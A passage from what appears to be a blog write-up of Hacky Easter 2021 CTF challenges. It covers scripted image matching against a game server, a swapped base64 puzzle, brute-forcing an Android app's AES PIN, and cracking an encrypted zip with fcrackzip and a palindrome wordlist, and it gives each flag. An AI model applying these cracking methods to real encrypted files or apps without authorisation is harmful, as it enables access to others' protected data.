everyone who can solve 10 successive rounds. 
Time per round is 30 seconds and only 3 misclicks are allowed.\r\n\r\n<span class=\"fake_link\">http:\/\/46.101.107.117:2107<\/span>\r\n\r\nNote: The service is restarted every hour at x:00.\r\n\r\n<b>Hint<\/b>\r\n\r\nNot solvable via UI\/browser, really.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe <span class=\"hl\">Memeory<\/span> is a real classic from HackyEaster: <a href=\"https:\/\/devel0pment.de\/?p=461#chlg04\" rel=\"noopener noreferrer\" target=\"_blank\">Memeory 2018<\/a>, <a href=\"https:\/\/devel0pment.de\/?p=1528#chlg11\" rel=\"noopener noreferrer\" target=\"_blank\">Memeory 2.0 2019<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nThis third iteration is even more challenging:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_01.png\" alt=\"Memeory\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe major challenge this time was that the individual pictures were always slightly modified by the server, not only by rotation but also by recoloring:\r\n<\/p>\r\n\r\n<p>\r\n<table>\r\n<tr>\r\n<td><img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_02.jpg\"\/><\/td>\r\n<td><img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_03.jpg\"\/><\/td>\r\n<td><img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_04.jpg\"\/><\/td>\r\n<\/tr>\r\n<tr>\r\n<td><img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_05.jpg\"\/><\/td>\r\n<td><img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_06.jpg\"\/><\/td>\r\n<td><img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_21_07.jpg\"\/><\/td>\r\n<\/tr>\r\n<\/table>\r\n<\/p>\r\n\r\n<p>\r\nThis made it more challenging to compare the pictures in order to find the correct pairs.\r\n<\/p>\r\n\r\n<p>\r\nI used the following (far from good, but working) strategy:\r\n<\/p>\r\n\r\n<p>\r\n<ul>\r\n<li>Retrieve the images in multiple threads and for each store the 4 possible rotations in a <span class=\"hl\">PIL.Image<\/span> 
object<\/li>\r\n<li>Try to find matches by using the <span class=\"hl\">difference<\/span> image from <span class=\"hl\">PIL.ImageChops<\/span> (only works if the coloring is the same)<\/li>\r\n<li>Try to find matches by looking for images where the difference in the RGB values for each pixel is quite low<\/li>\r\n<li>Try to find matches by looking for equal dimensions<\/li>\r\n<\/ul>\r\n<\/p>\r\n\r\n<p>\r\nThis resulted in the following script:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nimport requests\r\nimport random\r\nfrom PIL import Image\r\nfrom PIL import ImageChops\r\nfrom threading import Thread\r\n\r\nurl = 'http:\/\/46.101.107.117:2107'\r\n\r\nclass ImageGett0r(Thread):\r\n\r\n  def __init__(self, s, imgs, n):\r\n    super(ImageGett0r, self).__init__()\r\n    self.s = s\r\n    self.imgs = imgs\r\n    self.n = n\r\n\r\n  def run(self):\r\n    for i in self.n:\r\n      r = self.s.get(url+'\/pic\/'+str(i))\r\n      open('.\/pic\/'+str(i), 'wb').write(r.content)\r\n      img = Image.open('.\/pic\/'+str(i))\r\n      for j in range(4):\r\n        self.imgs[str(i)+'_'+str(j)] = img.rotate(90*j)\r\n\r\ndef are_the_same(i1, i2):\r\n  if (i1.size[0] == 200 and i1.size[1] == 200 and i2.size[0] == 200 and i2.size[1] == 200):\r\n    diff = ImageChops.difference(i1, i2)\r\n\r\n    # difference is actually empty? got a match!\r\n    if (not diff.getbbox()): return True\r\n\r\n    if (diff.getbbox()[0] &gt; 0 or diff.getbbox()[1] &gt; 0): return True\r\n\r\n    # if each RGB value in the diff image is quite low, the images are probably the same\r\n    pix = diff.load()\r\n    for w in range(diff.size[0]):\r\n      for h in range(diff.size[1]):\r\n        p = pix[w,h]\r\n        for s in range(3):\r\n          if (p[s] &gt; 100): return False\r\n    return True\r\n\r\n  # a few strange dimensions.. 
luckily only one pair per dimension\r\n  for d in [150, 193, 201, 211]:\r\n    if ((i1.size[0] == d or i1.size[1] == d) and (i2.size[0] == d or i2.size[1] == d)): return True\r\n  return False\r\n\r\ns = requests.Session()\r\n\r\nfor rnd in range(1,11):\r\n  print('Round '+str(rnd)+'\/10')\r\n  r = s.get(url)\r\n  imgs = {}\r\n  ts = []\r\n  for i in range(1,99,14):\r\n    t = ImageGett0r(s, imgs, list(range(i,i+14)))\r\n    t.start()\r\n    ts.append(t)\r\n  for t in ts: t.join()\r\n\r\n  matches = []\r\n  for i in range(1,99):\r\n    for j in range(1,99):\r\n      if (i == j): continue\r\n      for x in range(4):\r\n        if (are_the_same(imgs[str(i)+'_0'], imgs[str(j)+'_'+str(x)])):\r\n          if ((i,j) not in matches and (j,i) not in matches):\r\n            matches.append((i,j))\r\n            break\r\n\r\n  print('- found ' + str(len(matches))+' matches')\r\n  left = []\r\n  for i in range(1,99):\r\n    ok = False\r\n    for m in matches:\r\n      if (i == m[0] or i == m[1]):\r\n        ok = True\r\n        break\r\n    if (not ok): left.append(i)\r\n  print('pairs left: ' + str(left))\r\n  random.shuffle(left)\r\n  while (len(matches) &lt; 49):\r\n    # a little bit of guessing\r\n    matches.append((left.pop(), left.pop()))\r\n\r\n  r = None\r\n  for m in matches:\r\n    r = s.post(url+'\/solve', data={'first':m[0], 'second':m[1]}, proxies={'http':'http:\/\/localhost:8080'})\r\n  if (rnd == 10):\r\n    print(r.text)\r\n  elif (r.text != 'nextRound'):\r\n    print('fail')\r\n    quit()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nIf the above mentioned strategies did not find all matches, the script chooses the remaining matches randomly. 
Though it turned out to be relatively reliable.\r\n<\/p>\r\n\r\n<p>\r\nRunning the script yields the flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/21]\r\n\u2514\u2500$ .\/solv0r.py\r\nRound 1\/10\r\n- found 49 matches\r\npairs left: []\r\nRound 2\/10\r\n- found 49 matches\r\npairs left: []\r\nRound 3\/10\r\n- found 49 matches\r\npairs left: []\r\nRound 4\/10\r\n- found 49 matches\r\npairs left: []\r\nRound 5\/10\r\n- found 48 matches\r\npairs left: [17, 22]\r\nRound 6\/10\r\n- found 49 matches\r\npairs left: []\r\nRound 7\/10\r\n- found 49 matches\r\npairs left: []\r\nRound 8\/10\r\n- found 48 matches\r\npairs left: [84, 98]\r\nRound 9\/10\r\n- found 48 matches\r\npairs left: [19, 71]\r\nRound 10\/10\r\n- found 49 matches\r\npairs left: []\r\nok, here is your flag: he2021{0k-1-5u44end3r-y0u-w1n!}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{0k-1-5u44end3r-y0u-w1n!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_22\">HE21.22 46 Apes<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge22.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">6 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\n46 apes encoded a message for you:\r\n\r\n<span class=\"hl\">2Qu93ZhJHdsMGIlhmcgUXagMWe19icmBGbnFiOoBTZwIjM7FGd0gHdfNTbuB2a5V2X1JzcuF3MzNQf==<\/span>\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided string looks <span class=\"hl\">base64<\/span> encoded, but does not decode to something useful:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/22]\r\n\u2514\u2500$ echo 
2Qu93ZhJHdsMGIlhmcgUXagMWe19icmBGbnFiOoBTZwIjM7FGd0gHdfNTbuB2a5V2X1JzcuF3MzNQf==|base64 -d|hexdump -C\r\n00000000  d9 0b bd dd 98 49 1d db  0c 18 89 61 99 c8 14 5d  |.....I.....a...]|\r\n00000010  a8 0c 59 ed 7d 89 c9 81  19 b9 c5 88 ea 01 4d 9c  |..Y.}.........M.|\r\n00000020  08 8c ce c5 19 dd 20 1d  d7 cd 4d bb 81 d9 ae 55  |...... ...M....U|\r\n00000030  d9 7d 49 cd cb 85 dc cc  cd 41                    |.}I......A|\r\n0000003a\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nTrying to make some sense of this data did not lead anywhere. So I took a step back and reconsidered whether the provided string is really <span class=\"hl\">base64<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe name of the challenge is a hint: <span class=\"hl\">46 apes<\/span>. By swapping two characters at a time we get <span class=\"hl\">64 pase<\/span>, which is reminiscent of <span class=\"hl\">base64<\/span>. Doing the same thing (swapping each consecutive pair of characters) to the provided string yields the correct <span class=\"hl\">base64<\/span> encoded string:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nfrom base64 import b64decode\r\n\r\ns = '2Qu93ZhJHdsMGIlhmcgUXagMWe19icmBGbnFiOoBTZwIjM7FGd0gHdfNTbuB2a5V2X1JzcuF3MzNQf=='\r\nr = ''\r\n# swap every pair of adjacent characters: '2Q' -> 'Q2', 'u9' -> '9u', ...\r\nfor i in range(0, len(s), 2):\r\n  b = s[i:i+2]\r\n  r += b[::-1]\r\n\r\nprint(b64decode(r.encode()))\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning the script outputs the flag:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/22]\r\n\u2514\u2500$ .\/rox0r.py   \r\nb'Congrats, here is your flag: he2021{th4ts_m0nkey_bus1n3ss}'\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{th4ts_m0nkey_bus1n3ss}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_23\">HE21.23 Eggcryptor<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge23.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table 
class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">6 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Reversing<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nEggcryptor is hiding something from you.\r\n\r\nCrack it and get the Easter Egg!\r\n\r\n<span class=\"fake_link\">eggcryptor.apk<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nYou don't need to run the app. Just decompile and analyze it.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided file is an android application, which can be decompiled e.g. using <a href=\"https:\/\/github.com\/skylot\/jadx\" rel=\"noopener noreferrer\" target=\"_blank\">jadx<\/a>.\r\n<\/p>\r\n\r\n<p>\r\nWithin the <span class=\"hl\">MainActivity<\/span> of the application, we can see that there seems to be an <span class=\"hl\">EditText<\/span>, in which a PIN is supposed to be entered:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_23_01.png\" alt=\"Eggcryptor\"\/>\r\n<\/p>\r\n\r\n<p>\r\nIf the entered PIN matches a given pattern (<span class=\"hl\">p.matcher(pin.getText().matches()<\/span>), <span class=\"hl\">Crypto.decrypt<\/span> is used to decrypt the String <span class=\"hl\">r<\/span>, which was read from the resource <span class=\"hl\">R.raw.raw<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe decrypted byte array is then used as an image via <span class=\"hl\">image.setImageBitmap<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe <span class=\"hl\">Crypto.decrypt<\/span> function uses <span class=\"hl\">AES<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_23_02.png\" alt=\"Eggcryptor\"\/>\r\n<\/p>\r\n\r\n<p>\r\nThe regex used to verify the PIN pattern (<span class=\"hl\">[a-z][0-9]{4}<\/span>) can be found in <span class=\"hl\">strings.xml<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" 
src=\"wp-content\/uploads\/2021\/04\/he21_23_03.png\" alt=\"Eggcryptor\"\/>\r\n<\/p>\r\n\r\n<p>\r\nAccordingly, the PIN has to begin with a lowercase letter followed by 4 digits, which leaves only 26 * 10000 = 260,000 candidates.\r\n<\/p>\r\n\r\n<p>\r\nSince this sounds pretty bruteforceable, I copy-pasted the decrypt routine into a new Java class and added a bruteforcer around it.\r\n<\/p>\r\n\r\n<p>\r\nThis bruteforcer reads the encrypted bytes from the resource file <span class=\"hl\">raw.raw<\/span> (which can be retrieved by simply decompressing the <span class=\"hl\">.apk<\/span> file) and tries to decrypt them with all PIN combinations. If the decryption does not raise an exception, it does not necessarily mean that the PIN was correct: with a wrong key the last block still happens to end in valid PKCS#5 padding roughly once in 256 attempts. Thus we have to check the output. In order to do this, we can simply write the output to a file and run <span class=\"hl\">file<\/span> on it. Here is the class:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\nimport java.io.*;\r\nimport java.util.Base64;\r\nimport javax.crypto.Cipher;\r\nimport javax.crypto.SecretKeyFactory;\r\nimport javax.crypto.spec.PBEKeySpec;\r\nimport javax.crypto.spec.SecretKeySpec;\r\n\r\npublic class Crax0r {\r\n\r\n  public static void main(String args[]) throws Exception {\r\n    \/\/ read the base64-encoded ciphertext from the extracted resource\r\n    BufferedReader br = new BufferedReader(new FileReader(\"raw.raw\"));\r\n    StringBuilder sb = new StringBuilder();\r\n    String line = br.readLine();\r\n    while (line != null) {\r\n      sb.append(line);\r\n      line = br.readLine();\r\n    }\r\n    String enc64 = sb.toString();\r\n    br.close();\r\n    \r\n    \/\/ alphabet from regex: [a-z][0-9]{4}\r\n    String alpha1 = \"abcdefghijklmnopqrstuvwxyz\";\r\n    String alpha2 = \"0123456789\";\r\n    for (int i0 = 0; i0 &lt; alpha1.length(); i0++) {\r\n      for (int i1 = 0; i1 &lt; alpha2.length(); i1++) {\r\n        for (int i2 = 0; i2 &lt; alpha2.length(); i2++) {\r\n          for (int i3 = 0; i3 &lt; alpha2.length(); i3++) {\r\n            for (int i4 = 0; i4 &lt; 
alpha2.length(); i4++) {\r\n              String pin = \"\" + alpha1.charAt(i0)+alpha2.charAt(i1)+alpha2.charAt(i2)+alpha2.charAt(i3)+alpha2.charAt(i4);\r\n              try {\r\n                byte d[] = decrypt(pin, enc64);\r\n                check_output(d, pin);\r\n              } catch(Exception e) {\r\n                \/\/ BadPaddingException for most wrong PINs; nothing to do\r\n              }\r\n            }\r\n          }\r\n        }\r\n      }\r\n    }\r\n  }\r\n\r\n  \/\/ write the candidate plaintext to disk and let `file` tell us whether it looks like something real\r\n  public static void check_output(byte[] d, String pin) {\r\n    try {\r\n      try (FileOutputStream fos = new FileOutputStream(\"out_\"+pin)) {\r\n        fos.write(d);\r\n      }\r\n\r\n      Process p = Runtime.getRuntime().exec(\"file out_\"+pin);\r\n      String line;\r\n      Reader r = new InputStreamReader(p.getInputStream());\r\n      BufferedReader in = new BufferedReader(r);\r\n      while ((line = in.readLine()) != null) System.out.println(line);\r\n      in.close();\r\n    }\r\n    catch (Exception e) { }\r\n  }\r\n\r\n  \/\/ copied from the app's Crypto.decrypt: PBKDF2-HMAC-SHA256 with the fixed salt 0..7, 10000 iterations, 128-bit AES key\r\n  public static byte[] decrypt(String pin, String enc64) throws Exception {\r\n    byte[] salt = new byte[8];\r\n    for (int i = 0; i &lt; 8; i++) {\r\n      salt[i] = (byte) i;\r\n    }\r\n    SecretKeySpec key = new SecretKeySpec(SecretKeyFactory.getInstance(\"PBKDF2WithHmacSHA256\").generateSecret(new PBEKeySpec(pin.toCharArray(), salt, 10000, 128)).getEncoded(), \"AES\");\r\n    \/\/ plain \"AES\" resolves to AES\/ECB\/PKCS5Padding on the JDK\r\n    Cipher cipher = Cipher.getInstance(\"AES\");\r\n    cipher.init(Cipher.DECRYPT_MODE, key);\r\n    byte[] decodedBytes = Base64.getDecoder().decode(enc64);\r\n    return cipher.doFinal(decodedBytes);\r\n  }\r\n\r\n}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nRunning it displays the potentially correct PINs with the associated filetype:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/23]\r\n\u2514\u2500$ javac Crax0r.java && java Crax0r\r\nPicked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true\r\n^BPicked up _JAVA_OPTIONS: 
-Dawt.useSystemAAFontSettings=on -Dswing.aatext=true\r\nout_a0158: data\r\nout_a0837: PGP Secret Key -\r\nout_a1107: data\r\nout_a1202: data\r\nout_a1669: data\r\nout_a2073: data\r\nout_a2181: data\r\nout_a2346: data\r\nout_a2366: data\r\nout_a2629: data\r\nout_a2643: data\r\n...\r\nout_g0717: PNG image data, 1024 x 1024, 8-bit colormap, non-interlaced\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe PIN <span class=\"hl\">g0717<\/span> produced a valid PNG image:\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_23_04.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/23]\r\n\u2514\u2500$ zbarimg out_g0717     \r\nQR-Code:he2021{th3r3s_4_h4ck_4_th4t}\r\nscanned 1 barcode symbols from 1 images in 0.05 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{th3r3s_4_h4ck_4_th4t}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_24\">HE21.24 Taco Cat<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge24.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">6 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Crypto<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nWas it a cat I saw?\r\n\r\n<span class=\"fake_link\">tacocat.zip<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nlowercase\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided file is a zip archive:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ file tacocat.zip          \r\ntacocat.zip: Zip archive data, at least v2.0 to extract\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe archive contains the file <span 
class=\"hl\">eggge.png<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ zipinfo tacocat.zip \r\nArchive:  tacocat.zip\r\nZip file size: 19056 bytes, number of entries: 1\r\n-rw-r--r--  3.0 unx    20477 BX defN 20-May-19 10:51 eggge.png\r\n1 file, 20477 bytes uncompressed, 18860 bytes compressed:  7.9%\r\n\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThough it is encrypted:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ unzip tacocat.zip   \r\nArchive:  tacocat.zip\r\n[tacocat.zip] eggge.png password:\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nBoth the name of the challenge (<span class=\"hl\">tacocat<\/span>) and the filename (<span class=\"hl\">eggge.png<\/span>) are palindromes. Thus I created a wordlist of palindromic passwords based on <a href=\"https:\/\/github.com\/danielmiessler\/SecLists\/blob\/master\/Passwords\/Most-Popular-Letter-Passes.txt\" rel=\"noopener noreferrer\" target=\"_blank\">Most-Popular-Letter-Passes.txt<\/a> using the following script:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n#!\/usr\/bin\/env python3\r\n\r\nwl = '\/usr\/share\/wordlists\/SecLists\/Passwords\/Most-Popular-Letter-Passes.txt'\r\n\r\nwords = open(wl).read().split('\\n')\r\n\r\nf = open('wl.txt', 'w')\r\nfor w in words:\r\n  if not w: continue  # skip the empty entry after the trailing newline\r\n  # mirror the word around its last character: 'mouse' -> 'mousesuom'\r\n  w_new = w + w[::-1][1:]\r\n  f.write(w_new+'\\n')\r\nf.close()\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe script takes each password from the original wordlist and turns it into a palindrome:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ cat wl.txt\r\n...\r\nabacocaba\r\nabacusucaba\r\nabadaba\r\nabadanadaba\r\nabadiaidaba\r\nabaefeaba\r\nabagailiagaba\r\nabahaba\r\nabalaba\r\nabalonenolaba\r\nabalosolaba\r\nabamcmcmaba\r\n...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nUsing <span class=\"hl\">fcrackzip<\/span> and the generated wordlist, we can crack the password quite 
fast:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ fcrackzip -D -p wl.txt -u -v tacocat.zip\r\nfound file 'eggge.png', (size cp\/uc  18872\/ 20477, flags 9, chk 866d)\r\n\r\n\r\nPASSWORD FOUND!!!!: pw == mousesuom\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nUsing the password <span class=\"hl\">mousesuom<\/span> we can unzip the archive:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ unzip tacocat.zip \r\nArchive:  tacocat.zip\r\n[tacocat.zip] eggge.png password: \r\n  inflating: eggge.png               \r\n\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ file eggge.png                          \r\neggge.png: PNG image data, 1024 x 1024, 8-bit colormap, non-interlaced\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\n<img decoding=\"async\" src=\"wp-content\/uploads\/2021\/04\/he21_24_01.png\" alt=\"Egg\"\/>\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/24]\r\n\u2514\u2500$ zbarimg eggge.png \r\nQR-Code:he2021{!y0.ban4na.b0y!}\r\nscanned 1 barcode symbols from 1 images in 0.05 seconds\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe flag is <span class=\"hl\">he2021{!y0.ban4na.b0y!}<\/span>.\r\n\r\n<\/p>\r\n\r\n\r\n\r\n<hr\/>\r\n<h1 id=\"he21_25\">HE21.25 Lots of JWTs<\/h1>\r\n<table class=\"tblChlg\"><tr>\r\n<td width=\"300px\"><img src =\"wp-content\/uploads\/2021\/04\/challenge25.jpg\" width=\"300px\"\/><\/td>\r\n<td valign=\"top\">\r\n<table class=\"tblChlgInner\">\r\n<tr><td>Level:<\/td><td><span class=\"medium\">6 (medium)<\/span><\/td><\/tr>\r\n<tr><td>Category:<\/td><td>Misc<\/td><\/tr>\r\n<tr><td>Points:<\/td><td>200<\/td><\/tr>\r\n<tr><td>Author:<\/td><td>PS<\/td><\/tr>\r\n<\/table>\r\n<\/td><\/tr>\r\n<tr><td colspan=\"2\">\r\n<pre>\r\nSo many JWTs! 
What do they hide?\r\n\r\n<span class=\"fake_link\">jwts.txt<\/span>\r\n\r\n<b>Hint<\/b>\r\n\r\nYou better write a script.\r\n<\/pre>\r\n<\/td><\/tr>\r\n<\/table>\r\n\r\n<p>\r\nThe provided text file contains a huge <span class=\"hl\">JWT<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/25]   \r\n\u2514\u2500$ head -c 1000 jwts.txt\r\neyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJjdDIiOiJleUowZVhBaU9pSktWMVFpTENKaGJHY2lPaUpTVXpJMU5pSjkuZXlKamRESWlPaUpsZVVvd1pWaEJhVTlwU2t0V01WRnBURU5LYUdKSFkybFBhVXBUVlhwSk1VNXBTamt1WlhsS2FtUkVTV2xQYVVwc1pWVnZkMXBXYUVKaFZUbHdVMnQwVjAxV1JuQlVSVTVMWVVkS1NGa3liRkJoVlhCVVZsaHdTazFWTlhCVGFtdDFXbGhzUzJGdFVrVlRWMnhRWVZWd2MxcFdWblprTVhCWFlVVkthRlpVYkhkVk1uUXdWakF4VjFKdVFsVlNWVFZNV1ZWa1MxTkdhM2xpUmtKb1ZsaENWVlpzYUhkVGF6RldUbGhDVkdGdGRERlhiR2h6VXpKR2RGVnJWbE5XTW5oUldWWldkMDFXYkhGVWFrSnBWakJ3U1ZWdE1ERmlWbFYzWWtod1ZGWjZSbnBhVnpGUFRsWk9WVmRyY0dsV01taDZWVEZqTUdRd2VIUmFSRTVYVWxVMWMxZEVSbXRPVm1SeVlVVnNXbFpyU2paVk1HaDNWakpLYzFKVVFsVlNNMDB4Vkd4a1JtVnJPVWxSYTNCUVVtczFZVnBJY0ZOa2F6VnhVVzFzYTFKSGFESldNRlpoVFVkU1NWUnRkRk5pUjJoRVdrYzFTMkpYVG5KalJUbE5WMGRuZUZwRVFscGtNVlpaVld4Q1lWSldjRWhaTVZwRFZXMU9XRTFYV2xSU1JsWXdXVEZTUjFadFJsbGhSbWhUWVRKNE5WbHNXbUZXTWtaeVdrWkdWMkp1UWpKYVZXaERWRlpaZWxScVFrMVdNbWhXVlZaak5XUlhUblJQVjJ4WVZtdGFjRmt5YTNoa1JuQkhWRzVLYUUxdGFGcFVNVkpoWVVkR1JtVkhOVnBoTTFKS1ZqQm9SbVF5VG5Sa1JWcHJWa1ZhVlZkVVJ\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nA <span class=\"hl\">JWT<\/span> is structured like this: <span class=\"hl\">&lt;HEADER&gt;.&lt;PAYLOAD&gt;.&lt;SIGNATURE&gt;<\/span>.\r\n<\/p>\r\n\r\n<p>\r\nThe single components are <a href=\"https:\/\/tools.ietf.org\/html\/rfc4648#section-5\" rel=\"noopener noreferrer\" target=\"_blank\">base64url<\/a> encoded without the optional padding (<span class=\"hl\">=<\/span>).\r\n<\/p>\r\n\r\n<p>\r\nIn order to decode the <span class=\"hl\">PAYLOAD<\/span>, we can split the <span class=\"hl\">JWT<\/span> by dots (<span class=\"hl\">.<\/span>) and <span class=\"hl\">base64<\/span> 
decode the second entry:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/25]\r\n\u2514\u2500$ cat jwts.txt|cut -d '.' -f2|base64 -d\r\n{\"ct2\":\"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJjdDIiOiJleUowZVhB...\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThe <span class=\"hl\">JSON<\/span> output is quite big again and seems to contain multiple properties, most of which again contain a <span class=\"hl\">JWT<\/span>:\r\n<\/p>\r\n\r\n<p>\r\n<code>\r\n\u250c\u2500\u2500(kali\u327fkali)-[~\/ctf\/he21\/25]\r\n\u2514\u2500$ for f in $(cat jwts.txt|cut -d '.' -f2|base64 -d|tr , '\\n'); do echo $f|head -c60;echo; done\r\nbase64: invalid input\r\n{\"ct2\":\"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJjdDIiOiJleUo\r\n\"ct1\":\"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJjdDIiOiJleUow\r\n\"ct4\":\"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJjdDIiOiJleUow\r\n\"ct3\":\"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJjdDIiOiJleUow\r\n\"iss\":\"he\"}\r\n<\/code>\r\n<\/p>\r\n\r\n<p>\r\nThus I wrote the following script, which recursively parses the <span 